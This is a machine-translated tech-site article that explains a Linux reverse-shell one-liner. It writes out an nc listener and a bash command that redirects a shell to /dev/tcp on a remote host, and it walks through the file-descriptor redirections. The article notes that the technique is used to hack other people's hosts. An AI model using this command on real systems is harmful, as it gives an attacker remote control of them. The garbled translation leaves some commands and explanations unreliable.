In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-03 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Servers >
Share
Shulou(Shulou.com)06/01 Report--
This article mainly introduces "the parsing of Linux's bounce shell command". In daily operation, I believe many people have doubts about the parsing of Linux's bounce shell command. The editor has consulted all kinds of data and sorted out simple and easy-to-use operation methods. I hope it will be helpful to answer the doubts of "Linux bounce shell command parsing". Next, please follow the editor to study!
1. What is a rebound shell?
To put it simply, host A can return all the return values to A by executing the command on host B.
two。 The purpose of bouncing shell
Most of the purpose of this rebound shell is to hack into other people's hosts. It was because I felt so strong that I came to study this guy
3. Steps to rebound shell
3.1. Open port 9090 on this machine
Nc-lk 9090
3.2. Execute one of the following two commands on the machine that needs to be controlled
Bash-I > & / dev/tcp/10.0.0.1/9090 0 > & 1
3.3. Just enter the command of the host that needs to be controlled under the nc-lk 9090 command line of the local machine.
4. Principle
Host An opens the tcp service at port 9090
Host B connects to the 9090 tcp service of host A
Host A sends commands to host B through tcp service
Host B reads commands and executes them in bash
Host B sends the execution result to host A.
In this way, you can 'play' with host B in host A
Here's the point.
We think this operation is actually quite simple, but we can't just limit it to the surface. We need to understand how it works.
In fact, there is nothing to say about the nc-lk 9090 command. Baidu google came out as soon as it was searched. What we are going to explain today is bash-I > & / dev/tcp/10.0.0.1/9090 0 > & 1. No results were found on google for this order. So I have to work the night shift on my own.
The commonly used file descriptors under inux shell are:
Standard input (stdin): code is 0, using
< 或 或 >>
Standard error output (stderr): code is 2, use 2 > or 2 > >.
First of all, let's disassemble this order.
Bash-I # I don't know what to say > & # this command actually inputs stderr into stdout. It is equivalent to `> xxx 2 > & 1` / dev/tcp/10.0.0.1/9090 # this is port 9090 connected to 10.0.0.1 port 0 > & 1 # this has not been understood on google Baidu for a long time, and can only study the documents.
In fact, it is easy to understand the combination of the first three commands, which is to send all the output under this bash to 10.0.0.1 9090. You can do this yourself and get rid of the latter 0 > & 1.
It is easy to understand that we write 2 > & 1 in the command, which is to redirect error to stdout. But 0 > & 1 seems to be difficult to understand. Let's take a look at the file descriptor.
What we see here is that 2 > & 1 changes the device corresponding to the file descriptor 2 to the device corresponding to the file descriptor 1. In the same way, 0 > & 1 means to change the device corresponding to 0 to the device corresponding to 1, that is, socket. This indicates that stdin reads data from socket, and then executes the command, sending the command line return of bash to socket via stdout.
In fact, all these contents can be found in bash's man pages.
N&word is clearly written in the document, isn't it? copy word to n.
So it is all right to write 0x1 here, just copy the device corresponding to the file descriptor 1 to the file descriptor 0.
At this point, the study of "the parsing of Linux's bounce shell command" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.